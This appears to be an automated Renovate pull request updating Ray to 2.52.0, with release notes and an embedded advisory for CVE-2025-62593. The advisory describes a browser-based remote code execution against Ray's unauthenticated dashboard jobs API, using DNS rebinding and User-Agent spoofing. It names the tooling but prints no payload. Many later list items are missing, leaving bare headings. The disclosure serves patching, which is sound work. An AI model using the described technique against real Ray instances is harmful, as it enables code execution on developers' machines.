- Fixed RAY\_CHECK(inserted) inside reference counter
([#​58092](https://redirect.github.com/ray-project/ray/pull/58092))
- Fixed static type hints for ActorClass when setting options
([#​58439](https://redirect.github.com/ray-project/ray/pull/58439))
- Fixed exception type for accelerator ID visibility check
([#​58269](https://redirect.github.com/ray-project/ray/pull/58269))
- Fixed transport type handling in DAG node initialization
([#​57987](https://redirect.github.com/ray-project/ray/pull/57987))
- Fixed RAY\_NODE\_TYPE\_NAME handling when autoscaler is in read-only
mode
([#​58460](https://redirect.github.com/ray-project/ray/pull/58460))
- Ensure client\_call\_manager\_ outlives metrics\_agent\_client\_ in
core worker
([#​58315](https://redirect.github.com/ray-project/ray/pull/58315))
- Fixed header validation in dashboard tests
([#​58648](https://redirect.github.com/ray-project/ray/pull/58648))
- Validation of Ray-on-Spark-on-YARN mode to enable it to run
([#​58335](https://redirect.github.com/ray-project/ray/pull/58335))
📖 Documentation:
- Fix pattern\_async\_actor demo typo
([#​58486](https://redirect.github.com/ray-project/ray/pull/58486))
- Add limitations of RDT documentation
([#​58063](https://redirect.github.com/ray-project/ray/pull/58063))
- Add actor+job+node event to ray event export documentation
([#​57930](https://redirect.github.com/ray-project/ray/pull/57930))
- Remove implementation details from get\_runtime\_context docstring
([#​58212](https://redirect.github.com/ray-project/ray/pull/58212))
- Improved monitoring section with links
([#​58472](https://redirect.github.com/ray-project/ray/pull/58472))
🏗 Architecture:
- Refactor ActorInfoAccessor in gcs\_client to be mockable
([#​57241](https://redirect.github.com/ray-project/ray/pull/57241))
- Refactor reference\_counter out of memory store and plasma store
([#​57590](https://redirect.github.com/ray-project/ray/pull/57590))
- Remove reference counter mock for real reference counter in testing
([#​57178](https://redirect.github.com/ray-project/ray/pull/57178))
- Split raylet cython file into multiple files
([#​56575](https://redirect.github.com/ray-project/ray/pull/56575))
- Move ray\_syncer to top level directory
([#​58316](https://redirect.github.com/ray-project/ray/pull/58316))
- Move python\_callbacks to common
([#​57909](https://redirect.github.com/ray-project/ray/pull/57909))
- Consolidate find\_free\_port to network\_utils
([#​58304](https://redirect.github.com/ray-project/ray/pull/58304))
- Implement event merge logic at export time
([#​58070](https://redirect.github.com/ray-project/ray/pull/58070))
- Feature flag for enabling ray export event
([#​57999](https://redirect.github.com/ray-project/ray/pull/57999))
- Add comments explaining ray\_syncer\_ channels in Raylet
([#​58342](https://redirect.github.com/ray-project/ray/pull/58342))
- Integration tests for task event generation
([#​57636](https://redirect.github.com/ray-project/ray/pull/57636))
##### Dashboard
💫 Enhancements:
- Added percentage usage graphs for resources
([#​57549](https://redirect.github.com/ray-project/ray/pull/57549))
- Sub-tabs with full Grafana dashboard embeds on Metrics tab
([#​57561](https://redirect.github.com/ray-project/ray/pull/57561))
- Added queued blocks to operator panels
([#​57739](https://redirect.github.com/ray-project/ray/pull/57739))
- Improved operator metrics logging
([#​57702](https://redirect.github.com/ray-project/ray/pull/57702))
- Make do\_reply accept status\_code instead of success bool
([#​58384](https://redirect.github.com/ray-project/ray/pull/58384))
- Add denial of fetch headers
([#​58553](https://redirect.github.com/ray-project/ray/pull/58553))
🔨 Fixes:
- Fixed broken Ray Data per node metrics due to unsupported operator
filter
([#​57970](https://redirect.github.com/ray-project/ray/pull/57970))
- Filtered out ANSI escape codes from logs
([#​53370](https://redirect.github.com/ray-project/ray/pull/53370))
📖 Documentation:
- Expose dashboard URL when deploying on Yarn using Skein
([#​57793](https://redirect.github.com/ray-project/ray/pull/57793))
##### Autoscaler + KubeRay
🎉 New Features:
- KubeRay autoscaling support with top-level Resources and Labels fields
([#​57260](https://redirect.github.com/ray-project/ray/pull/57260))
- Bundle label selector support in request\_resources SDK
([#​54843](https://redirect.github.com/ray-project/ray/pull/54843))
💫 Enhancements:
- Azure VM launcher release test
([#​57921](https://redirect.github.com/ray-project/ray/pull/57921))
- Azure CLI added to base-extra image
([#​58012](https://redirect.github.com/ray-project/ray/pull/58012))
📖 Documentation:
- Label selector guide
([#​58157](https://redirect.github.com/ray-project/ray/pull/58157))
- Add minimum version requirement on kai-scheduler
([#​58161](https://redirect.github.com/ray-project/ray/pull/58161))
- Mention RayJob gang scheduling for Yunikorn
([#​58375](https://redirect.github.com/ray-project/ray/pull/58375))
- Add Volcano RayJob gang scheduling example
([#​58320](https://redirect.github.com/ray-project/ray/pull/58320))
- Add KAI scheduler integration documentation
([#​54857](https://redirect.github.com/ray-project/ray/pull/54857))
- Kuberay sidecar mode
([#​58273](https://redirect.github.com/ray-project/ray/pull/58273))
- Update RayJob documentation with new DeletionStrategy
([#​58306](https://redirect.github.com/ray-project/ray/pull/58306))
- Add guidance for RayService initialization timeout
([#​58238](https://redirect.github.com/ray-project/ray/pull/58238))
- Update version to 1.5.0
([#​58452](https://redirect.github.com/ray-project/ray/pull/58452))
- Add output example of CLI commands
([#​58078](https://redirect.github.com/ray-project/ray/pull/58078))
- Fix invalid syntax in label\_selector
([#​58352](https://redirect.github.com/ray-project/ray/pull/58352))
Thank You to all the Contributors!
[@​marosset](https://redirect.github.com/marosset),
[@​curiosity-hyf](https://redirect.github.com/curiosity-hyf),
[@​bveeramani](https://redirect.github.com/bveeramani),
[@​Future-Outlier](https://redirect.github.com/Future-Outlier),
[@​saihaj](https://redirect.github.com/saihaj),
[@​ZacAttack](https://redirect.github.com/ZacAttack),
[@​ArthurBook](https://redirect.github.com/ArthurBook),
[@​crypdick](https://redirect.github.com/crypdick),
[@​Aydin-ab](https://redirect.github.com/Aydin-ab),
[@​elliot-barn](https://redirect.github.com/elliot-barn),
[@​Kunchd](https://redirect.github.com/Kunchd),
[@​justinvyu](https://redirect.github.com/justinvyu),
[@​jjyao](https://redirect.github.com/jjyao),
[@​gangsf](https://redirect.github.com/gangsf),
[@​sunsetxh](https://redirect.github.com/sunsetxh),
[@​Daraan](https://redirect.github.com/Daraan),
[@​justinyeh1995](https://redirect.github.com/justinyeh1995),
[@​MatthewCWeston](https://redirect.github.com/MatthewCWeston),
[@​kyuds](https://redirect.github.com/kyuds),
[@​daiping8](https://redirect.github.com/daiping8),
[@​sauravvenkat](https://redirect.github.com/sauravvenkat),
[@​omatthew98](https://redirect.github.com/omatthew98),
[@​CowKeyMan](https://redirect.github.com/CowKeyMan),
[@​morotti](https://redirect.github.com/morotti),
[@​israbbani](https://redirect.github.com/israbbani),
[@​goutamvenkat-anyscale](https://redirect.github.com/goutamvenkat-anyscale),
[@​fscnick](https://redirect.github.com/fscnick),
[@​Zakelly](https://redirect.github.com/Zakelly),
[@​xyuzh](https://redirect.github.com/xyuzh),
[@​kouroshHakha](https://redirect.github.com/kouroshHakha),
[@​owenowenisme](https://redirect.github.com/owenowenisme),
[@​Qiaolin-Yu](https://redirect.github.com/Qiaolin-Yu),
[@​czgdp1807](https://redirect.github.com/czgdp1807),
[@​shen-shanshan](https://redirect.github.com/shen-shanshan),
[@​wph95](https://redirect.github.com/wph95),
[@​iamjustinhsu](https://redirect.github.com/iamjustinhsu),
[@​MengjinYan](https://redirect.github.com/MengjinYan),
[@​jugalshah291](https://redirect.github.com/jugalshah291),
[@​Yicheng-Lu-llll](https://redirect.github.com/Yicheng-Lu-llll),
[@​ryanaoleary](https://redirect.github.com/ryanaoleary),
[@​nadongjun](https://redirect.github.com/nadongjun),
[@​xinyuangui2](https://redirect.github.com/xinyuangui2),
[@​ideal](https://redirect.github.com/ideal),
[@​my-vegetable-has-exploded](https://redirect.github.com/my-vegetable-has-exploded),
[@​lucaschadwicklam97](https://redirect.github.com/lucaschadwicklam97),
[@​tianyi-ge](https://redirect.github.com/tianyi-ge),
[@​ahao-anyscale](https://redirect.github.com/ahao-anyscale),
[@​abrarsheikh](https://redirect.github.com/abrarsheikh),
[@​Blaze-DSP](https://redirect.github.com/Blaze-DSP),
[@​rueian](https://redirect.github.com/rueian),
[@​thomasdesr](https://redirect.github.com/thomasdesr),
[@​CaiZhanqi](https://redirect.github.com/CaiZhanqi),
[@​harshit-anyscale](https://redirect.github.com/harshit-anyscale),
[@​jeffreyjeffreywang](https://redirect.github.com/jeffreyjeffreywang),
[@​TimothySeah](https://redirect.github.com/TimothySeah),
[@​codope](https://redirect.github.com/codope),
[@​sampan-s-nayak](https://redirect.github.com/sampan-s-nayak),
[@​andrewsykim](https://redirect.github.com/andrewsykim),
[@​xingsuo-zbz](https://redirect.github.com/xingsuo-zbz),
[@​aslonnie](https://redirect.github.com/aslonnie),
[@​OneSizeFitsQuorum](https://redirect.github.com/OneSizeFitsQuorum),
[@​ryankert01](https://redirect.github.com/ryankert01),
[@​Sparks0219](https://redirect.github.com/Sparks0219),
[@​soffer-anyscale](https://redirect.github.com/soffer-anyscale),
[@​akyang-anyscale](https://redirect.github.com/akyang-anyscale),
[@​alanwguo](https://redirect.github.com/alanwguo),
[@​chrisfellowes-anyscale](https://redirect.github.com/chrisfellowes-anyscale),
[@​richo-anyscale](https://redirect.github.com/richo-anyscale),
[@​alexeykudinkin](https://redirect.github.com/alexeykudinkin),
[@​JasonLi1909](https://redirect.github.com/JasonLi1909),
[@​ruisearch42](https://redirect.github.com/ruisearch42),
[@​EkinKarabulut](https://redirect.github.com/EkinKarabulut),
[@​MarcoGorelli](https://redirect.github.com/MarcoGorelli),
[@​SolitaryThinker](https://redirect.github.com/SolitaryThinker),
[@​srinathk10](https://redirect.github.com/srinathk10),
[@​dayshah](https://redirect.github.com/dayshah),
[@​richardliaw](https://redirect.github.com/richardliaw),
[@​pseudo-rnd-thoughts](https://redirect.github.com/pseudo-rnd-thoughts),
[@​win5923](https://redirect.github.com/win5923),
[@​axreldable](https://redirect.github.com/axreldable),
[@​matthewdeng](https://redirect.github.com/matthewdeng),
[@​ArturNiederfahrenhorst](https://redirect.github.com/ArturNiederfahrenhorst),
[@​can-anyscale](https://redirect.github.com/can-anyscale),
[@​khluu](https://redirect.github.com/khluu),
[@​landscapepainter](https://redirect.github.com/landscapepainter),
[@​kevin85421](https://redirect.github.com/kevin85421),
[@​seanlaii](https://redirect.github.com/seanlaii),
[@​edoakes](https://redirect.github.com/edoakes),
[@​nrghosh](https://redirect.github.com/nrghosh),
[@​eicherseiji](https://redirect.github.com/eicherseiji),
[@​Artimislyy](https://redirect.github.com/Artimislyy),
[@​cem-anyscale](https://redirect.github.com/cem-anyscale),
[@​coqian](https://redirect.github.com/coqian),
[@​chiayi](https://redirect.github.com/chiayi),
[@​liulehui](https://redirect.github.com/liulehui)
###
[`v2.51.2`](https://redirect.github.com/ray-project/ray/releases/tag/ray-2.51.2)
[Compare
Source](https://redirect.github.com/ray-project/ray/compare/ray-2.51.1...ray-2.51.2)
- Fix for CVE-2025-62593: reject Sec-Fetch-\* other browser-specific
headers in dashboard browser rejection logic
###
[`v2.51.1`](https://redirect.github.com/ray-project/ray/releases/tag/ray-2.51.1)
[Compare
Source](https://redirect.github.com/ray-project/ray/compare/ray-2.51.0...ray-2.51.1)
- Reuse previous metadata if transferring the same tensor list with
`nixl`
([#​58309](https://redirect.github.com/ray-project/ray/pull/58309))
###
[`v2.51.0`](https://redirect.github.com/ray-project/ray/releases/tag/ray-2.51.0)
[Compare
Source](https://redirect.github.com/ray-project/ray/compare/ray-2.50.1...ray-2.51.0)
##### Release Highlights
**Ray Train:**
- Ray Train v2 is now enabled by default! Ray Train v2 provides
usability and stability improvements, as well as new features. For more
details, see the
[REP](https://redirect.github.com/ray-project/enhancements/blob/main/reps/2024-10-18-train-tune-api-revamp/2024-10-18-train-tune-api-revamp.md)
and [Migration
Guide](https://redirect.github.com/ray-project/ray/issues/49454). To
disable Ray Train v2, set the environment variable
`RAY_TRAIN_V2_ENABLED=0`.
**Ray Serve:**
- Application-level autoscaling: Introduces custom autoscaling policies
that operate across all deployments in an application, enabling
coordinated scaling decisions based on aggregate metrics. This is a
significant advancement over per-deployment autoscaling, allowing for
more intelligent resource management at the application level.
- Enhanced autoscaling capabilities with replica-level metrics: Wires up
`AutoscalingContext` with `total_running_requests`,
`total_queued_requests`, and `total_num_requests`, plus adds support for
min, max, and time-weighted average aggregation functions. These
improvements give users fine-grained control to implement sophisticated
custom autoscaling policies based on real-time workload metrics.
##### Ray Libraries
##### Ray Data
🎉 New Features:
- Added enhanced support for Unity Catalog integration
([#​57954](https://redirect.github.com/ray-project/ray/issues/57954),
[#​58049](https://redirect.github.com/ray-project/ray/issues/58049))
- New expression evaluator infrastructure for improved query
optimization
([#​57778](https://redirect.github.com/ray-project/ray/issues/57778),
[#​57855](https://redirect.github.com/ray-project/ray/issues/57855))
- Support for SaveMode in write operations
([#​57946](https://redirect.github.com/ray-project/ray/issues/57946))
- Added approximate quantile aggregator
([#​57598](https://redirect.github.com/ray-project/ray/issues/57598))
- MCAP datasource support for robotics data
([#​55716](https://redirect.github.com/ray-project/ray/issues/55716))
- Callback-based stat computation for preprocessors and ValueCounter
([#​56848](https://redirect.github.com/ray-project/ray/issues/56848))
- Support for multiple download URIs with improved error handling
([#​57775](https://redirect.github.com/ray-project/ray/issues/57775))
💫 Enhancements:
- Improved projection pushdown handling with renamed columns
([#​58033](https://redirect.github.com/ray-project/ray/issues/58033),
[#​58037](https://redirect.github.com/ray-project/ray/issues/58037),
[#​58040](https://redirect.github.com/ray-project/ray/issues/58040),
[#​58071](https://redirect.github.com/ray-project/ray/issues/58071))
- Enhanced hash-shuffle performance with better retry policies
([#​57572](https://redirect.github.com/ray-project/ray/issues/57572))
- Streamlined concurrency parameter semantics
([#​57035](https://redirect.github.com/ray-project/ray/issues/57035))
- Improved execution progress rendering
([#​56992](https://redirect.github.com/ray-project/ray/issues/56992))
- Better handling of empty columns in pandas blocks
([#​57740](https://redirect.github.com/ray-project/ray/issues/57740))
- Enhanced support for complex data types and column operations
([#​57271](https://redirect.github.com/ray-project/ray/issues/57271))
- Reduced memory usage with improved streaming generator backpressure
([#​57688](https://redirect.github.com/ray-project/ray/issues/57688))
- Enhanced preemption testing and utilities
([#​57883](https://redirect.github.com/ray-project/ray/issues/57883))
- Improved Download operator display names
([#​57773](https://redirect.github.com/ray-project/ray/issues/57773))
- Better handling of variable-shaped tensors and tensor columns
([#​57240](https://redirect.github.com/ray-project/ray/issues/57240))
- Optimized aggregator execution with out-of-order processing by default
([#​57753](https://redirect.github.com/ray-project/ray/issues/57753))
🔨 Fixes:
- Fixed renamed columns to be appropriately dropped from output
([#​58040](https://redirect.github.com/ray-project/ray/issues/58040),
[#​58071](https://redirect.github.com/ray-project/ray/issues/58071))
- Fixed handling of renames in projection pushdown
([#​58033](https://redirect.github.com/ray-project/ray/issues/58033),
[#​58037](https://redirect.github.com/ray-project/ray/issues/58037))
- Fixed vLLMEngineStage field name inconsistency for images
([#​57980](https://redirect.github.com/ray-project/ray/issues/57980))
- Fixed driver hang during streaming generator block metadata retrieval
([#​56451](https://redirect.github.com/ray-project/ray/issues/56451))
- Fixed retry policy for hash-shuffle tasks
([#​57572](https://redirect.github.com/ray-project/ray/issues/57572))
- Fixed prefetch loop to avoid blocking on fetches
([#​57613](https://redirect.github.com/ray-project/ray/issues/57613))
- Fixed empty projection handling
([#​57740](https://redirect.github.com/ray-project/ray/issues/57740))
- Fixed errors with concatenation of mixed pyarrow native and extension
types
([#​56811](https://redirect.github.com/ray-project/ray/issues/56811))
📖 Documentation:
- Updated document embedding benchmark to use canonical Ray Data API
([#​57977](https://redirect.github.com/ray-project/ray/issues/57977))
- Improved concurrency-related documentation
([#​57658](https://redirect.github.com/ray-project/ray/issues/57658))
- Updated preprocessing and data handling examples
##### Ray Train
🎉 New features
- Turn on Train v2 by default
([#​57857](https://redirect.github.com/ray-project/ray/issues/57857))
- Top-level `ray.train` aliases for public APIs
([#​57758](https://redirect.github.com/ray-project/ray/issues/57758))
💫 Enhancements
- Raise clear errors when mixing v1/v2 APIs
([#​57570](https://redirect.github.com/ray-project/ray/issues/57570))
- JAX backend: add `jax.distributed.shutdown()` for `JaxBackend`
([#​57802](https://redirect.github.com/ray-project/ray/issues/57802))
- Update `TrainingFailedError` module (
</details>
---
### Configuration
📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).
🚦 **Automerge**: Enabled.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/vortex-data/vortex).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi43NC41IiwidXBkYXRlZEluVmVyIjoiNDIuNzQuNSIsInRhcmdldEJyYW5jaCI6ImRldmVsb3AiLCJsYWJlbHMiOlsiY2hvcmUiXX0=-->
---------
Signed-off-by: Adam Gutglick <adam@spiraldb.com>
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: Adam Gutglick <adam@spiraldb.com>
This PR contains the following updates:
2.50.0→2.52.0GitHub Vulnerability Alerts
CVE-2025-62593
Summary
Developers working with Ray as a development tool can be exploited via a critical RCE vulnerability exploitable via Firefox and Safari.
Due to the longstanding decision by the Ray Development team to not implement any sort of authentication on critical endpoints, like the
/api/jobs&/api/job_agent/jobs/has once again led to a severe vulnerability that allows attackers to execute arbitrary code against Ray. This time in a development context via the browsers Firefox and Safari.This vulnerability is due to an insufficient guard against browser-based attacks, as the current defense uses the
User-Agentheader starting with the string "Mozilla" as a defense mechanism. This defense is insufficient as the fetch specification allows theUser-Agentheader to be modified.Combined with a DNS rebinding attack against the browser, and this vulnerability is exploitable against a developer running Ray who inadvertently visits a malicious website, or is served a malicious advertisement (malvertising).
Details
The mitigations implemented to protect against browser based attacks against local Ray nodes are insufficient.
Current Mitigation Strategies
https://github.com/ray-project/ray/blob/f39a860436dca3ed5b9dfae84bd867ac10c84dc6/python/ray/dashboard/optional_utils.py#L129-L155
https://github.com/ray-project/ray/blob/e7889ae542bf0188610bc8b06d274cbf53790cbd/python/ray/dashboard/http_server_head.py#L184-L196
This is because the fundamental assumption that the
User-Agentheader can't be manipulated is incorrect. In Firefox and in Safari, thefetchAPI allows theUser-Agentheader to be set to a different value. Chrome is not vulnerable, ironically, because of a bug, bringing it out of spec with thefetchspecification.Exploiting this vulnerability requires a DNS rebinding attack against the browser. Something trivially done by modern tooling like nccgroup/singularity.
PoC
Please note, this full PoC will be going live at time of disclosure.
ray start --head --port=63798265Ray Jobs RCE (default port 8265)If this attack doesn't work, consider clicking the "Toggle Advanced Options" and trying an alternative "Rebinding Strategy". I've personally been able to get this attack to work multiple times on MacOS on multiple different residential networks around the Seattle area. Some corporate networks may block DNS rebinding attacks, but likely not many.
What's going on?
This is the payload running in nccgroup/singularity:
See: https://github.com/nccgroup/singularity/pull/68
Impact
This vulnerability impacts developers running development/testing environments with Ray. If they fall victim to a phishing attack, or are served a malicious ad, they can be exploited and arbitrary shell code can be executed on their developer machine.
This attack can also be leveraged to attack network-adjacent instance of ray by leveraging the browser as a confused deputy intermediary to attack ray instances running inside a private corporate network.
Fix
The fix for this vulnerability is to update to Ray 2.52.0 or higher. This version also, finally, adds a disabled-by-default authentication feature that can further harden against this vulnerability: https://docs.ray.io/en/latest/ray-security/token-auth.html
Fix commit: ray-project/ray@70e7c72
Several browsers have, after knowing about the attack for 19 years, recently begun hardening against DNS rebinding. (Chrome Local Network Access). These changes may protect you, but a previous initiative, "private network access" was rolled back. So updating is highly recommended as a defense-in-depth strategy.
Credit
The fetch bypass was originally theorized by @avilum at Oligo. The DNS rebinding step, full POC, and disclosure was by @JLLeitschuh while at Socket.
Release Notes
ray-project/ray (ray)
v2.52.0Compare Source
Release Highlights
Ray Core:
Ray Data:
Ray Libraries
Ray Data
🎉 New Features:
💫 Enhancements:
🔨 Fixes:
📖 Documentation:
🏗 Architecture:
Ray Train
🎉 New Features:
💫 Enhancements:
📖 Documentation:
Ray Serve
🎉 New Features:
/api/users/{user_id}) instead of just route prefixes, enabling granular endpoint monitoring without high cardinality issues. Performance impact is minimal (~1% RPS decrease). (#58180)list_outbound_deployments()method to discover downstream deployment dependencies, enabling programmatic analysis of service topology for both stored and dynamically-obtained handles. (#58345, #58350)ReplicaRankschema with global, node-level, and local ranks to support advanced coordination scenarios like tensor parallelism and model sharding across nodes. (#58471, #58473)serve.run()completes, improving deployment reliability. (#57723)💫 Enhancements:
RAY_SERVE_THROUGHPUT_OPTIMIZEDwithout manually configuring all flags, improving flexibility for performance tuning. (#58057)ray_serve_*) and improved observability infrastructure. (#56432)RunningReplicaInfoobjects passed in long-poll updates, avoiding complex reference counting patterns. (#58174)IMPLICIT_RESOURCE_PREFIXfromReplicaConfig.ray_actor_optionsto prevent internal resource annotations from leaking into user-visible configurations. (#58275)from_proxy_managerargument toget_target_groups()for finer control over returned routing targets. (#57620)🔨 Fixes:
_TaskConsumerWrapperduring async inference implementation. (#57664)serve runnow respectsproxy_locationfrom config files instead of hardcodingEveryNode, andserve.start()no longer defaults toHeadOnlywhenhttp_optionsare provided without an explicit location. (#57622)stabilityai/stable-diffusion-2was deprecated on Hugging Face. (#58609)📖 Documentation:
🏗 Architecture refactoring:
RankManagerclass with type-safeReplicaRankrepresentation, creating a cleaner foundation for future multi-level rank support. (#58471, #58473)Ray Tune
💫 Enhancements:
RLlib
🎉 New Features:
💫 Enhancements:
🔨 Fixes:
📖 Documentation:
Ray Core
🎉 New Features:
💫 Enhancements:
🔨 Fixes:
📖 Documentation:
🏗 Architecture:
Dashboard
💫 Enhancements:
🔨 Fixes:
📖 Documentation:
Autoscaler + KubeRay
🎉 New Features:
💫 Enhancements:
📖 Documentation:
Thank You to all the Contributors!
@marosset, @curiosity-hyf, @bveeramani, @Future-Outlier, @saihaj, @ZacAttack, @ArthurBook, @crypdick, @Aydin-ab, @elliot-barn, @Kunchd, @justinvyu, @jjyao, @gangsf, @sunsetxh, @Daraan, @justinyeh1995, @MatthewCWeston, @kyuds, @daiping8, @sauravvenkat, @omatthew98, @CowKeyMan, @morotti, @israbbani, @goutamvenkat-anyscale, @fscnick, @Zakelly, @xyuzh, @kouroshHakha, @owenowenisme, @Qiaolin-Yu, @czgdp1807, @shen-shanshan, @wph95, @iamjustinhsu, @MengjinYan, @jugalshah291, @Yicheng-Lu-llll, @ryanaoleary, @nadongjun, @xinyuangui2, @ideal, @my-vegetable-has-exploded, @lucaschadwicklam97, @tianyi-ge, @ahao-anyscale, @abrarsheikh, @Blaze-DSP, @rueian, @thomasdesr, @CaiZhanqi, @harshit-anyscale, @jeffreyjeffreywang, @TimothySeah, @codope, @sampan-s-nayak, @andrewsykim, @xingsuo-zbz, @aslonnie, @OneSizeFitsQuorum, @ryankert01, @Sparks0219, @soffer-anyscale, @akyang-anyscale, @alanwguo, @chrisfellowes-anyscale, @richo-anyscale, @alexeykudinkin, @JasonLi1909, @ruisearch42, @EkinKarabulut, @MarcoGorelli, @SolitaryThinker, @srinathk10, @dayshah, @richardliaw, @pseudo-rnd-thoughts, @win5923, @axreldable, @matthewdeng, @ArturNiederfahrenhorst, @can-anyscale, @khluu, @landscapepainter, @kevin85421, @seanlaii, @edoakes, @nrghosh, @eicherseiji, @Artimislyy, @cem-anyscale, @coqian, @chiayi, @liulehui
v2.51.2Compare Source
v2.51.1Compare Source
nixl(#58309)v2.51.0Compare Source
Release Highlights
Ray Train:
RAY_TRAIN_V2_ENABLED=0.Ray Serve:
AutoscalingContextwithtotal_running_requests,total_queued_requests, andtotal_num_requests, plus adds support for min, max, and time-weighted average aggregation functions. These improvements give users fine-grained control to implement sophisticated custom autoscaling policies based on real-time workload metrics.Ray Libraries
Ray Data
🎉 New Features:
💫 Enhancements:
🔨 Fixes:
📖 Documentation:
Ray Train
🎉 New features
ray.trainaliases for public APIs (#57758)💫 Enhancements
jax.distributed.shutdown()forJaxBackend(#57802)TrainingFailedErrormodule (Configuration
📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 Automerge: Enabled.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about these updates again.
This PR was generated by Mend Renovate. View the repository job log.